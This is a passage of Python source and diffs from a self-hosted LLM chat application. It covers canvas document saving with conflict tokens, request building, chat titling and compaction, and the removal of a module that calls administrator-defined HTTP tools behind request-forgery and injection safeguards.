title=doc.title or "Scratch",
subtitle="This chat's scratch document",
text=doc.body or "",
revision=_stamp(doc, doc.body or ""),
writable=True,
language="scratch.md",
markdown=True,
)
# --- Saving --------------------------------------------------------------------------
async def _save_agent(db: DBSession, user: User, chat: Chat, ref: str, text: str, revision: str):
executor = _executor(db, user, chat)
path = path_key(chat.project_dir, ref)
try:
await executor.write_text(path, text, if_unchanged=revision)
except ExecError as exc:
raise Refused(str(exc)) from exc
profile = agent_ready(db, user, chat)
if profile is not None:
# Unconditionally, unlike `file_edit` -- whose skip is an optimisation
# for the model's hot path on the grounds that the file was already
# there. The canvas can create one, and a listing known to be wrong is
# what the cache note warns about.
index_service.forget_dir(profile.id, chat.project_dir)
if instructions_service.is_instruction_file(path, chat.project_dir):
instructions_service.forget(profile.id, chat.project_dir)
return await _load_agent(db, user, chat, path)
async def _save_note(db: DBSession, user: User, chat: Chat, ref: str, text: str, revision: str):
note = notes_service.get(db, ref, user)
if note is None:
raise Refused("That note is not there any more.")
if not sharing.can_write(note, user):
raise Refused("That note is not yours to change.")
_check_stamp(note, note.body or "", revision)
notes_service.update(db, note, body=text)
return await _load_note(db, user, chat, ref)
async def _save_skill(db: DBSession, user: User, chat: Chat, ref: str, text: str, revision: str):
skill = skills_service.get(db, ref, user)
if skill is None:
raise Refused("That skill is not there any more.")
if not sharing.can_write(skill, user):
raise Refused("That skill is not yours to change.")
_check_stamp(skill, skill.body or "", revision)
# Snapshots into a SkillRevision first, which is why a skill needs no
# conflict story beyond the token: a clobber is recoverable.
skills_service.update(db, skill, body=text, note="Edited in the canvas")
return await _load_skill(db, user, chat, ref)
async def _save_doc(db: DBSession, user: User, chat: Chat, ref: str, text: str, revision: str):
document = documents_service.get(db, ref, user)
if document is None:
raise Refused("That document is not there any more.")
if not documents_service.can_write(document, user):
raise Refused("That document is not yours to change.")
_check_stamp(document, document.extracted_text or "", revision)
documents_service.set_text(db, document, text)
return await _load_doc(db, user, chat, ref)
async def _save_scratch(db: DBSession, user: User, chat: Chat, ref: str, text: str, revision: str):
if ref != chat.id:
raise Refused("That scratch document belongs to another chat.")
doc = scratch_service.for_chat(db, chat)
_check_stamp(doc, doc.body or "", revision)
scratch_service.update(db, doc, body=text)
return await _load_scratch(db, user, chat, ref)
# --- One table -------------------------------------------------------------------------
_SOURCES: dict[str, tuple] = {
SOURCE_AGENT: (_load_agent, _save_agent),
SOURCE_NOTE: (_load_note, _save_note),
SOURCE_SKILL: (_load_skill, _save_skill),
SOURCE_DOC: (_load_doc, _save_doc),
SOURCE_FILE: (_load_file, None),
SOURCE_SCRATCH: (_load_scratch, _save_scratch),
}
async def load(db: DBSession, user: User, chat: Chat, key: str) -> Doc:
source, ref = split(key)
entry = _SOURCES.get(source)
if entry is None or not ref:
raise Refused("There is nothing to open here.")
return await entry[0](db, user, chat, ref)
async def save(
db: DBSession, user: User, chat: Chat, key: str, text: str, revision: str = ""
) -> Doc:
source, ref = split(key)
entry = _SOURCES.get(source)
if entry is None or not ref:
raise Refused("There is nothing to save here.")
saver = entry[1]
if saver is None:
raise Refused("This one can only be read.")
return await saver(db, user, chat, ref, text, revision)
# --- Small shared pieces ------------------------------------------------------------------
def _needs_library(db: DBSession, user: User) -> None:
if not permissions.has(db, user, "library.use"):
raise Refused("You do not have access to the library.")
def _stamp(row, text: str) -> str:
"""A revision token for a database row.
`updated_at` alone would not move for two saves inside one clock tick, so
the length rides along -- the same pairing the file token uses, and for the
same reason. The text is passed in rather than guessed at: a note keeps it
in `body` and a document in `extracted_text`, and a getattr chain that
silently found neither would hand every row the same token.
"""
when = getattr(row, "updated_at", None)
if when is not None and when.tzinfo is None:
# SQLite does not store the offset, so a row loaded from disk comes back
# naive while one still in the session's identity map keeps the tzinfo
# it was created with -- and `.timestamp()` reads a naive value as local
# time. Without this the same row yields two different tokens depending
# on where it was loaded, and every save outside UTC would report a
# conflict that is not there. The same normalisation
# `compaction.moment` makes, for the same reason.
when = when.replace(tzinfo=UTC)
return revision_of(int(when.timestamp()) if when else 0, len(text or ""))
def _check_stamp(row, text: str, revision: str) -> None:
"""Refuse a save whose token no longer matches. An empty token overwrites.
Empty is what Overwrite on the conflict card sends: somebody has been shown
both versions and chosen. Never save silently over a change; never discard
silently either.
"""
if revision and _stamp(row, text) != revision:
raise Conflict(_stamp(row, text))
+17 -216
View File
@@ -10,7 +10,6 @@ from sqlalchemy import func, select
from sqlalchemy.orm import Session as DBSession
from lembas.db.models import (
KIND_MESSAGES,
ROLE_ASSISTANT,
ROLE_SYSTEM,
ROLE_USER,
@@ -34,13 +33,6 @@ FORWARDED_PARAMS = frozenset(
MAX_TITLE_LENGTH = 60
# What one title call may spend. A title is a handful of words; the rest of this
# is headroom for a model that thinks before it answers, which is most of the
# interesting local ones. Too small is not a shorter title -- it is no title at
# all, because the thinking consumes the budget and the content field comes back
# empty or holding an unclosed `<think>`.
TITLE_MAX_TOKENS = 512
# How long a temporary chat survives after the last thing said in it.
TEMPORARY_LIFETIME = timedelta(hours=24)
@@ -97,30 +89,14 @@ def document_context(message: Message) -> str:
if not attachment.extracted_text.strip():
continue
note = " (truncated)" if attachment.truncated else ""
# Where it came from, when there is a where. A model handed `main.py`
# cannot tell which of four it is looking at, and cannot name the file
# back when asked to change something -- so a file read off a machine
# says which machine and which path. Quotes are stripped rather than
# escaped: these are attribute values in a tag the model reads, and a
# path containing one would otherwise close it early.
where = ""
if attachment.source_path:
where += f' path="{_attr(attachment.source_path)}"'
if attachment.source_label:
where += f' from="{_attr(attachment.source_label)}"'
blocks.append(
f'<document name="{_attr(attachment.filename)}"{where}{note}>\n'
f'<document name="{attachment.filename}"{note}>\n'
f"{attachment.extracted_text.strip()}\n"
f"</document>"
)
return "\n\n".join(blocks)
def _attr(value: str) -> str:
"""A value safe to sit inside the double quotes of a tag we are writing."""
return value.replace('"', "").replace("<", "").replace(">", "").replace("\n", " ")
def message_payload(message: Message, *, vision: bool) -> dict[str, Any]:
"""One history entry in the shape the endpoint expects.
@@ -136,16 +112,7 @@ def message_payload(message: Message, *, vision: bool) -> dict[str, Any]:
# in view, which is how these models are trained to read a prompt.
text = f"{documents}\n\n{text}" if text else documents
# Images ride on a *user* turn and nowhere else. Until image generation
# existed no assistant message had ever carried one, so this was never a
# distinction worth drawing -- and the moment one does, the multimodal list
# form on an `assistant` turn is rejected outright by OpenAI and by most
# local runners, which would break not that turn but every later one in the
# chat. What follows from it, and is worth knowing rather than discovering:
# a model cannot see the picture it made on a *subsequent* turn (tool
# results are not replayed either), so "make it bluer" regenerates rather
# than edits. Honest for a text-to-image workflow with no img2img path.
images = message.images if (vision and message.role == ROLE_USER) else []
images = message.images if vision else []
if not images:
return {"role": message.role, "content": text}
@@ -166,53 +133,23 @@ def message_payload(message: Message, *, vision: bool) -> dict[str, Any]:
return {"role": message.role, "content": parts}
def folder_system_prompt(db: DBSession, chat: Chat) -> str:
"""The nearest prompt on the chat's folder, or on a folder above it.
Walks up rather than reading one level, because folders nest and a project's
prompt belongs on the project rather than on each sub-folder of it. The
nearest one wins, which is the same rule the ladder as a whole follows.
Bounded and cycle-safe the way `api/folders.py:_depth_of` is. Reparenting
already refuses to build a cycle, but this runs on the request path for
every reply and a row written by something else must not be able to hang it.
"""
from lembas.db.models import Folder
folder = chat.folder
seen: set[str] = set()
while folder is not None and folder.id not in seen:
seen.add(folder.id)
if (folder.system_prompt or "").strip():
return folder.system_prompt.strip()
folder = db.get(Folder, folder.parent_id) if folder.parent_id else None
return ""
def effective_system_prompt(db: DBSession, chat: Chat) -> str:
"""The system prompt a chat actually runs with.
Four layers, most specific wins outright:
Three layers, most specific wins outright:
chat > folder > model > instance
chat > model > instance
Precedence rather than concatenation. Stacking them reads well in a
settings screen and badly in practice: the moment two layers disagree the
model gets contradictory instructions and nobody can tell which one is
losing. With precedence, "why is it behaving like this" has one answer.
The folder sits above the model because it is the more specific statement:
a model's prompt describes the model wherever it is used, and a folder's
describes this piece of work whichever model is pointed at it.
"""
from lembas.services import settings_store
if chat.system_prompt.strip():
return chat.system_prompt.strip()
if inherited := folder_system_prompt(db, chat):
return inherited
model = db.scalar(
select(Model).where(Model.model_id == chat.model_id).order_by(Model.position)
)
@@ -266,21 +203,6 @@ def build_messages(
select(Message).where(Message.chat_id == chat.id).order_by(Message.created_at)
).all()
# The Messages conversation never ends, so it cannot all be sent. Only the
# most recent turns go; everything before them stays on screen and out of
# the request. One branch, and the bound is applied before the loop rather
# than inside it so the filters below still see a contiguous tail.
#
# Not compaction: that summarises with a model call and a threshold, on a
# conversation somebody decided to shorten. This is mechanical, lossless and
# permanent, which is why `compaction.should_compact` refuses this kind --
# two mechanisms fighting over one transcript is how you get a summary of a
# summary.
if chat.kind == KIND_MESSAGES:
from lembas.services import messages as messages_service
history = history[-messages_service.LIVE_CHUNK :]
for message in history:
if upto is not None and message.id == upto.id:
break
@@ -288,11 +210,6 @@ def build_messages(
message
) <= compaction_service.moment(cutoff):
continue
# Typed while the previous reply was still being written, and not yet
# handed to a model. It is in the transcript and it is not in the
# request; delivery is what moves it from one to the other.
if message.queued:
continue
# Skip turns that failed or produced nothing -- but a message carrying
# only an attachment has no text and must still be sent.
if message.error:
@@ -329,7 +246,6 @@ def build_request(
upto: Message | None = None,
tools: list[dict[str, Any]] | None = None,
user=None,
force_tool: str = "",
) -> dict[str, Any]:
"""The whole request body, tools and harness included.
@@ -373,70 +289,9 @@ def build_request(
}
if tools:
body["tools"] = tools
# Making the model call one particular tool, for `/image` -- the whole
# of what that command is. Only ever sent alongside a tools array and
# only when something asked for it, so a provider strict about unknown
# parameters sees exactly the request it always did until somebody types
# a slash command.
#
# An endpoint that ignores `tool_choice` is not a failure here: the turn
# still carries the instruction in words, so the model is being steered
# twice and the weaker half is the one that can be dropped.
if force_tool and any(
(tool.get("function") or {}).get("name") == force_tool for tool in tools
):
body["tool_choice"] = {"type": "function", "function": {"name": force_tool}}
apply_effort(body, (chat.params_json or {}).get("reasoning_effort"))
return body
# Reasoning effort, and why it goes out twice.
#
# There is no one field that works. OpenAI and vLLM read a plain
# `reasoning_effort`. llama.cpp reads it too and, per its own documentation,
# "other values (e.g. 'low', 'max') have no effect" -- its maintainer is blunter
# still: "llama-server cannot support reasoning_effort at all", and the field
# "simply gets dropped without error or logging". What *does* reach a gpt-oss
# behind llama.cpp is `chat_template_kwargs`, which it accepts per request.
#
# So both are sent, and only when an effort has actually been chosen. That
# second half is what keeps this from being a regression: a chat nobody has set
# an effort on sends neither field and is byte-for-byte what it was. An endpoint
# strict about unknown parameters will refuse the extra one -- but on a chat
# somebody deliberately set an effort on, not on every chat in the instance.
EFFORTS = ("low", "medium", "high")
def resolved_effort(chat) -> str:
"""The effort this chat will actually send, or "" for none.
Its own value, and nothing else. The model's default is a **seed** applied
when the chat is created (`api/chats.py:_new_chat`) and on a model change,
and is deliberately not consulted here for two reasons. A chat's request
should be a function of the chat row alone -- the same rule that has PDF
text extracted once at upload and knowledge attachments copied. And a
fallback would break "off": `update_chat` stores `None` for a cleared
effort, a fallback would resurrect the model's default underneath it, and
the off option would silently do nothing.
The picker shows exactly this, which is the whole point of it existing:
"Effort: default" named no level and was true of nothing in particular.
"""
value = (getattr(chat, "params_json", None) or {}).get("reasoning_effort")
return value if value in EFFORTS else ""
def apply_effort(body: dict[str, Any], effort: str | None) -> None:
"""Put a chosen reasoning effort into a request body, in both forms."""
if not effort or effort not in EFFORTS:
return
body["reasoning_effort"] = effort
kwargs = dict(body.get("chat_template_kwargs") or {})
kwargs["reasoning_effort"] = effort
body["chat_template_kwargs"] = kwargs
def default_model(db: DBSession, user=None) -> tuple[str, str] | None:
"""The model a new chat should start with, as (model_id, connection_id).
@@ -514,45 +369,24 @@ async def generate_title(
if not template.strip():
return fallback_title(question)
from lembas.services.reasoning import strip_reasoning
prompt = prompts_service.substitute(
template, {"question": question[:500], "answer": answer[:500]}
)
body = {
"model": model_id,
"messages": [{"role": ROLE_USER, "content": prompt}],
# Enough that a model which thinks before answering can do both. It was
# 24, which is ample for six words and nowhere near enough for a
# reasoning model: the whole budget went on thinking and the reply came
# back either empty or as an unclosed `<think>`, so every chat on such a
# model silently fell back to its first prompt and looked as though
# titling had never run.
"max_tokens": TITLE_MAX_TOKENS,
"temperature": 0.2,
}
# Deliberately *not* `apply_effort(body, "low")`, tempting as it is: naming
# a chat does not reward deliberation and a low effort would make this call
# much cheaper. But `reasoning_effort` and `chat_template_kwargs` appear
# only when somebody has opted in, precisely so a provider strict about
# unknown parameters sees exactly the request it always did — and sending
# them here would put them on every instance's title call, where a 400 is
# caught and turned into a fallback title. That is titling silently
# switching itself off, which is the failure this whole change is fixing.
# The token budget above is what makes room for the thinking instead.
try:
raw = await complete(endpoint, body)
raw = await complete(
endpoint,
{
"model": model_id,
"messages": [{"role": ROLE_USER, "content": prompt}],
"max_tokens": 24,
"temperature": 0.2,
},
)
except LLMError as exc:
log.debug("auto-title failed, using fallback: %s", exc)
return fallback_title(question)
# `complete` hands back `message.content` as it arrived. A model that emits
# `<think>` tags inline puts them in exactly that field, so without this the
# title was "<think>Okay, the user wants a short title for". Reasoning sent
# in a separate `reasoning_content` field is ignored by `complete` already.
answered, _thinking = strip_reasoning(raw)
title = " ".join(answered.split()).strip().strip('"“”\'')
title = " ".join(raw.split()).strip().strip('"“”\'')
# Small models sometimes ignore the instruction and answer the question
# instead; an over-long reply is a better signal of that than anything else.
if not title or len(title) > MAX_TITLE_LENGTH * 1.5:
@@ -568,8 +402,6 @@ def create_message(
*,
complete_: bool = True,
model_id: str = "",
queued: bool = False,
machine: bool = False,
) -> Message:
message = Message(
chat_id=chat.id,
@@ -577,8 +409,6 @@ def create_message(
content=content,
complete=complete_,
model_id=model_id,
queued=queued,
machine=machine,
)
db.add(message)
db.commit()
@@ -621,37 +451,6 @@ async def summarise_for_compaction(
return raw.strip()
def delete_chats(db: DBSession, chats) -> int:
"""Delete chats, and the files their attachments point at.
**The one way to delete a chat.** `db.delete(chat)` cascades to its messages
and to its attachment *rows*, and leaves every file on disk -- a generated
image, an uploaded PDF, a photo -- with nothing that will ever look at them
again: `sweep_orphans` only considers uploads that were never attached.
`files_service.remove_files_for_chats` was written for exactly this and was
called from one place, the temporary sweep. The delete button, a schedule's
task chat, a helper's hidden chat and deleting an account all went straight
to `db.delete`, so four of the five ways a chat can end leaked its files.
That is `sharing.forget_principal` again: a helper that exists, is correct,
and is not called on the path that needs it.
The order matters and is why this is a function rather than a note. The
files have to be unlinked **while the rows still say which they are**, so it
happens before the delete and in the same session.
Does not commit -- the caller decides, because some of them are deleting
other things in the same transaction.
"""
live = [chat for chat in chats if chat is not None]
if not live:
return 0
files_service.remove_files_for_chats(db, [chat.id for chat in live])
for chat in live:
db.delete(chat)
return len(live)
def sweep_temporary(db: DBSession, older_than: timedelta = TEMPORARY_LIFETIME) -> int:
"""Delete temporary chats nobody has touched for a day.
@@ -683,7 +482,9 @@ def sweep_temporary(db: DBSession, older_than: timedelta = TEMPORARY_LIFETIME) -
if not stale:
return 0
delete_chats(db, stale)
files_service.remove_files_for_chats(db, [chat.id for chat in stale])
for chat in stale:
db.delete(chat)
db.commit()
log.info("swept %d temporary chat(s)", len(stale))
return len(stale)
+3 -18
View File
@@ -25,7 +25,7 @@ from datetime import UTC, datetime
from sqlalchemy import select
from sqlalchemy.orm import Session as DBSession
from lembas.db.models import KIND_MESSAGES, ROLE_ASSISTANT, Chat, Message
from lembas.db.models import ROLE_ASSISTANT, Chat, Message
from lembas.services import metrics as metrics_service
from lembas.services import settings_store, tokens
@@ -98,12 +98,8 @@ def split(
return [], list(messages)
boundary = moment(cutoff)
return (
# A prompt still waiting to be sent stays on the live side whatever its
# timestamp says. Folding one into the "earlier messages" details would
# hide the only place its Send now and Discard exist, and it has not
# been part of any request to summarise.
[m for m in messages if not m.queued and moment(m) <= boundary],
[m for m in messages if m.queued or moment(m) > boundary],
[m for m in messages if moment(m) <= boundary],
[m for m in messages if moment(m) > boundary],
)
@@ -137,9 +133,6 @@ def transcript(db: DBSession, chat: Chat, *, upto: Message) -> str:
Message.chat_id == chat.id,
Message.created_at <= upto.created_at,
Message.error == "",
# Not yet sent to anything. Summarising it would fold words the model
# has never seen into the record, and then deliver them again later.
Message.queued.is_(False),
)
if previous is not None:
query = query.where(Message.created_at > previous.created_at)
@@ -187,14 +180,6 @@ def should_compact(db: DBSession, chat: Chat, *, pending: str = "") -> bool:
if limit <= 0:
return False
# The Messages conversation bounds its own request mechanically, in
# `build_messages`. Two mechanisms narrowing one transcript is how a summary
# ends up summarising a summary -- and this one would be summarising turns
# that are already outside the request, which achieves nothing at the cost
# of a model call and a divider on a page that has no divider.
if chat.kind == KIND_MESSAGES:
return False
last = last_complete(db, chat)
if last is None:
return False
-443
View File
@@ -1,443 +0,0 @@
"""Running the HTTP tools an administrator defined.
A row in `custom_tools` becomes a `ToolDef` like any built-in: same schema in
the same array, same `ToolOutcome` back. What is different is that the arguments
come from a model and the destination comes from a template, so two things have
to hold.
**An argument may fill a hole; it may not move the target.** The scheme and host
of the template are literal, checked when the row is saved and again here in
case a row predates the check, and every value is escaped for the position it
lands in -- percent-encoded with nothing safe in a URL, JSON-escaped in a body,
stripped of line breaks in a header. `quote(value, safe="")` is what stops a
value adding a path segment, a query parameter or a fragment; pinning the origin
afterwards is what catches anything that got past it.
**Every hop is checked.** This is the same request-forgery problem
`services/fetch.py` exists to solve, and the same answer: resolve and check the
address, follow redirects by hand, refuse private ranges unless this particular
row was allowed them. `fetch.fetch` itself cannot be reused -- it is GET-only,
has no body, and refuses any content type that is not HTML or text, which is
every JSON API there is -- so its redirect loop is deliberately copied rather
than the module bent into a general HTTP client.
The secret is decrypted into the snapshot and goes nowhere else: not into the
event, not into a log line, and not across a redirect that leaves the origin it
was issued for.
"""
from __future__ import annotations
import json
import logging
from dataclasses import dataclass, field
from typing import Any
from urllib.parse import quote, urlparse
import httpx
from sqlalchemy.orm import Session as DBSession
from lembas.db.models import (
RESPONSE_JSON,
RESPONSE_RAW,
RESPONSE_TEXT,
SECRET_BEARER,
SECRET_HEADER,
SECRET_QUERY,
CustomTool,
User,
)
from lembas.services import fetch as fetch_service
from lembas.services import tool_access
from lembas.services.crypto import decrypt
from lembas.services.prompts import VARIABLE_PATTERN
from lembas.services.tools import RISK_READ, RISK_WRITE, ToolContext, ToolDef, ToolOutcome
log = logging.getLogger(__name__)
# What a response may weigh before it is cut off. Well below the page fetcher's
# ceiling, because this is text that will be sent back to a model rather than
# stored for a person to read.
MAX_RESPONSE_BYTES = 2 * 1024 * 1024
# How much of the response is kept on the message row for the transcript. Capped
# separately from `max_chars`: what the model reads is spent once, what the event
# holds is stored on every message forever.
MAX_EVENT_CHARS = 2000
# How much of the arguments the transcript summarises.
MAX_SUMMARY_CHARS = 200
ALLOWED_METHODS = ("GET", "POST", "PUT", "PATCH", "DELETE")
# Bounds an administrator's number is clamped into. A tool that may return
# 400 000 characters is a tool that can fill the context window in one call.
MIN_CHARS, MAX_CHARS = 200, 40_000
MIN_TIMEOUT, MAX_TIMEOUT = 1, 120
@dataclass(frozen=True)
class HttpSpec:
"""Everything one custom tool needs, read while the session was open.
A frozen snapshot rather than the row, for the reason `Endpoint` is one: a
generation outlives the request that started it, and a detached SQLAlchemy
instance is a trap. The decrypted secret lives here and nowhere else.
"""
slug: str
label: str
method: str
url_template: str
body_template: str = ""
headers: dict[str, str] = field(default_factory=dict)
secret: str = ""
secret_placement: str = SECRET_BEARER
secret_name: str = "Authorization"
response_mode: str = RESPONSE_TEXT
response_path: str = ""
max_chars: int = 8000
timeout: int = 20
allow_private: bool = False
parameters: dict[str, Any] = field(default_factory=dict)
@property
def secret_header(self) -> str:
"""The header the secret rides in, if it rides in one."""
if not self.secret or self.secret_placement not in (SECRET_BEARER, SECRET_HEADER):
return ""
return self.secret_name or "Authorization"
def spec_from(row: CustomTool) -> HttpSpec:
"""Snapshot a row, decrypting its secret. Call this with a session open."""
return HttpSpec(
slug=row.slug,
label=row.name or row.slug,
method=(row.method or "GET").upper(),
url_template=row.url_template or "",
body_template=row.body_template or "",
headers=dict(row.headers_json or {}),
secret=decrypt(row.secret_encrypted),
secret_placement=row.secret_placement,
secret_name=row.secret_name or "Authorization",
response_mode=row.response_mode,
response_path=row.response_path or "",
max_chars=min(max(int(row.max_chars or 0), MIN_CHARS), MAX_CHARS),
timeout=min(max(int(row.timeout or 0), MIN_TIMEOUT), MAX_TIMEOUT),
allow_private=bool(row.allow_private),
parameters=dict(row.parameters_json or {}),
)
def tool_defs(
db: DBSession, user: User | None, *, everything: bool = False
) -> list[ToolDef]:
"""One `ToolDef` per custom tool this user may be offered."""
return [
ToolDef(
name=row.slug,
family=f"custom:{row.slug}",
description=row.description or f"Call the {row.name} tool.",
parameters=_schema_of(row),
run=_runner(spec_from(row)),
risk=_risk_of(row),
)
for row in tool_access.visible_custom_tools(db, user, everything=everything)
]
def _risk_of(row: CustomTool) -> str:
"""What calling this tool does to the world, as far as the method says.
The method is all there is to go on, and it is a reasonable proxy: GET and
HEAD are defined to be safe, and everything else is a request to change
something. Guessing wrong in the cautious direction only means an agent
chat asks about a call it need not have.
"""
return RISK_READ if (row.method or "GET").upper() in ("GET", "HEAD") else RISK_WRITE
def _schema_of(row: CustomTool) -> dict[str, Any]:
schema = dict(row.parameters_json or {})
if schema.get("type") != "object":
# An endpoint expects an object here; anything else it will reject
# outright, which fails the whole request rather than the one tool.
return {"type": "object", "properties": {}}
return schema
def _runner(spec: HttpSpec):
async def run(context: ToolContext, args: dict[str, Any]) -> ToolOutcome:
return await call(spec, args)
return run
# --- Filling the template ----------------------------------------------------
def _scalar(value: Any) -> str:
"""One argument as text, before it is escaped for wherever it is going."""
if value is None:
return ""
if isinstance(value, bool):
return "true" if value else "false"
if isinstance(value, str):
return value
if isinstance(value, int | float):
return str(value)
return json.dumps(value, ensure_ascii=False)
def _for_url(value: str) -> str:
# safe="" is the whole point: an argument must not be able to introduce a
# path segment, a query separator or a fragment.
return quote(value, safe="")
def _for_body(value: str) -> str:
# The inside of a JSON string, so a quote or a backslash in an argument
# cannot end it early and add a field of its own.
return json.dumps(value, ensure_ascii=False)[1:-1]
def _for_header(value: str) -> str:
# A newline in a header value is header injection. Other control characters
# go with it; none of them mean anything in a header.
return "".join(character for character in value if character.isprintable())
def _substitute(template: str, spec: HttpSpec, args: dict[str, Any], escape) -> str:
"""Fill `{{name}}` from the call's arguments.
Not `prompts.substitute`, though the grammar is shared. The rules differ,
and the differences are the point: a name the tool does not declare never
substitutes, an unrecognised one becomes nothing rather than passing through
verbatim -- a literal `{{x}}` in a URL is not a feature -- and every value
is escaped for where it lands.
"""
declared = set(spec.parameters.get("properties") or {})
def swap(match) -> str:
name = match.group(1)
if name not in declared:
return ""
return escape(_scalar(args.get(name)))
return VARIABLE_PATTERN.sub(swap, template)
def _origin(url: str) -> tuple[str, str]:
parsed = urlparse(url)
if parsed.scheme not in ("http", "https"):
raise fetch_service.FetchError("A tool's URL must start with http:// or https://")
if not parsed.netloc:
raise fetch_service.FetchError("A tool's URL has no host.")
return parsed.scheme, parsed.netloc
def fill_url(spec: HttpSpec, args: dict[str, Any]) -> str:
"""Fill the URL template, refusing anything that moved the host.
Checked twice over: the template's own scheme and authority must be literal,
and the filled URL must still point at them. The first check is what stops
`https://{{host}}/x` from ever being saved; the second is what catches a row
that predates it, or an escaping mistake.
"""
template = spec.url_template.strip()
scheme, netloc = _origin(template)
if VARIABLE_PATTERN.search(f"{scheme}://{netloc}"):
raise fetch_service.FetchError(
"A tool's scheme and host must be literal, not filled from an argument."
)
filled = _substitute(template, spec, args, _for_url)
if _origin(filled) != (scheme, netloc):
raise fetch_service.FetchError("That call would have pointed somewhere else.")
return filled
def _prepare(spec: HttpSpec, args: dict[str, Any]) -> tuple[str, dict[str, str], bytes | None]:
"""The URL, headers and body for one call, secret included."""
url = fill_url(spec, args)
headers = {
"User-Agent": fetch_service.USER_AGENT,
"Accept": "application/json, text/*;q=0.9, */*;q=0.5",
}
for name, value in spec.headers.items():
clean = _for_header(str(name)).strip()
if clean:
headers[clean] = _substitute(str(value), spec, args, _for_header)
body: bytes | None = None
if spec.body_template.strip() and spec.method != "GET":
body = _substitute(spec.body_template, spec, args, _for_body).encode("utf-8")
headers.setdefault("Content-Type", "application/json")
if spec.secret:
if spec.secret_placement == SECRET_BEARER:
headers[spec.secret_name or "Authorization"] = f"Bearer {spec.secret}"
elif spec.secret_placement == SECRET_HEADER:
headers[spec.secret_name or "Authorization"] = spec.secret
elif spec.secret_placement == SECRET_QUERY:
# Only on the URL this call starts at. A redirect's Location
# replaces the query, so the credential does not travel on by
# itself -- which is the behaviour wanted anyway.
joiner = "&" if urlparse(url).query else "?"
url = f"{url}{joiner}{quote(spec.secret_name)}={quote(spec.secret, safe='')}"
return url, headers, body
# --- Reading the response ----------------------------------------------------
def _narrow(payload: Any, path: str) -> Any:
"""Walk a dotted path into a decoded JSON document.
Integer segments index a list, so "data.0.title" works. A path that does not
lead anywhere yields the whole document rather than nothing: an unhelpful
answer beats a silent empty one when the model has to explain itself.
"""
current = payload
for segment in [part for part in path.split(".") if part]:
if isinstance(current, dict) and segment in current:
current = current[segment]
elif isinstance(current, list) and segment.lstrip("-").isdigit():
try:
current = current[int(segment)]
except IndexError:
return payload
else:
return payload
return current
def _decode(payload: bytes, response: httpx.Response) -> str:
return payload.decode(response.encoding or "utf-8", "replace")
def _as_text(spec: HttpSpec, payload: bytes, response: httpx.Response) -> str:
content_type = response.headers.get("content-type", "")
if spec.response_mode == RESPONSE_JSON:
try:
document = json.loads(_decode(payload, response))
except (json.JSONDecodeError, UnicodeDecodeError):
# Falling back rather than failing: a JSON API answering with an
# HTML error page is a thing the model can report usefully.
return _decode(payload, response)
value = _narrow(document, spec.response_path)
if isinstance(value, str):
return value
return json.dumps(value, indent=2, ensure_ascii=False)
if spec.response_mode == RESPONSE_RAW:
return _decode(payload, response)
text = _decode(payload, response)
if "html" in content_type or text.lstrip()[:1] == "<":
_, text = fetch_service.html_to_text(text)
return text
def _clip(text: str, limit: int) -> str:
if len(text) <= limit:
return text
return text[:limit].rstrip() + "\n… (truncated)"
def _summary(args: dict[str, Any]) -> str:
"""What the transcript shows the tool was asked for."""
parts = [f"{name}={_scalar(value)!r}" for name, value in args.items()]
return _clip(", ".join(parts), MAX_SUMMARY_CHARS)
def _event(spec: HttpSpec, args: dict[str, Any], *, status: str, **extra: Any) -> dict[str, Any]:
return {
"name": spec.slug,
"kind": "custom",
"label": spec.label,
"query": _summary(args),
# The host, never the filled URL: a path or query segment can carry an
# argument, and the event is rendered and stored.
"detail": f"{spec.method} {urlparse(spec.url_template).netloc}",
"status": status,
"results": [],
**extra,
}
# --- Making the call ---------------------------------------------------------
async def call(spec: HttpSpec, args: dict[str, Any]) -> ToolOutcome:
"""Run one custom tool. Reports its own failures rather than raising."""
try:
url, headers, body = _prepare(spec, args)
current = fetch_service.check_url(url, allow_private=spec.allow_private)
origin = _origin(current)
response = await _send(spec, current, headers, body, origin)
except fetch_service.FetchError as exc:
return ToolOutcome(
f"The {spec.label} tool could not be called: {exc.message}",
_event(spec, args, status="error", error=exc.message),
)
except httpx.RequestError as exc:
message = f"Could not reach the {spec.label} tool: {exc}"
return ToolOutcome(message, _event(spec, args, status="error", error=str(exc)[:200]))
payload = response.content[:MAX_RESPONSE_BYTES]
text = _clip(_as_text(spec, payload, response).strip(), spec.max_chars)
if response.status_code >= 400:
note = f"{spec.label} returned HTTP {response.status_code}."
return ToolOutcome(
f"{note}\n\n{text}" if text else note,
_event(
spec,
args,
status="error",
error=f"HTTP {response.status_code}",
text=text[:MAX_EVENT_CHARS],
),
)
if not text:
return ToolOutcome(
f"{spec.label} returned nothing.",
_event(spec, args, status="ok", text=""),
)
return ToolOutcome(text, _event(spec, args, status="ok", text=text[:MAX_EVENT_CHARS]))
async def _send(
spec: HttpSpec,
url: str,
headers: dict[str, str],
body: bytes | None,
origin: tuple[str, str],
) -> httpx.Response:
"""Send the request, following redirects by hand so each hop is checked."""
current = url
async with httpx.AsyncClient(timeout=spec.timeout, follow_redirects=False) as client:
for _ in range(fetch_service.MAX_REDIRECTS + 1):
response = await client.request(
spec.method, current, headers=headers, content=body
)
if not response.is_redirect:
return response
location = response.headers.get("location", "")
if not location:
raise fetch_service.FetchError("That tool redirected to nowhere.")
current = fetch_service.check_url(
str(response.url.join(location)), allow_private=spec.allow_private
)
if _origin(current) != origin:
# A server that can redirect us anywhere must not be able to
# redirect us at somebody else carrying the key.
if spec.secret_header:
headers.pop(spec.secret_header, None)
origin = _origin(current)
raise fetch_service.FetchError("That tool redirected too many times.")
__all__ = ["HttpSpec", "call", "fill_url", "spec_from", "tool_defs"]
+1 -28
View File
@@ -47,27 +47,6 @@ _DROPPED = re.compile(
re.IGNORECASE | re.DOTALL,
)
_TITLE = re.compile(r"<title[^>]*>(.*?)</title>", re.IGNORECASE | re.DOTALL)
# Content types that are text but are not spelled `text/*`. The sniff below was
# written for "save this page into my library" and refused every one of them,
# which meant every JSON API there is -- wrong for the link-attach path already,
# and unusable once a model can ask for a URL itself. Widened by exactly this
# list plus the `+json` / `+xml` suffixes, and no further: images, PDFs and
# application/octet-stream still raise, because handing a model five megabytes
# of binary is the thing the refusal was for.
_TEXTUAL = frozenset(
{
"application/json",
"application/xml",
"application/xhtml+xml",
"application/javascript",
"application/x-ndjson",
"application/yaml",
"application/x-yaml",
"application/toml",
"application/sql",
}
)
# Tags that end a line of prose. Turning them into newlines before the tags are
# stripped is the difference between readable text and one enormous paragraph.
_BREAKS = re.compile(
@@ -214,15 +193,9 @@ async def fetch(url: str, *, allow_private: bool = False) -> Fetched:
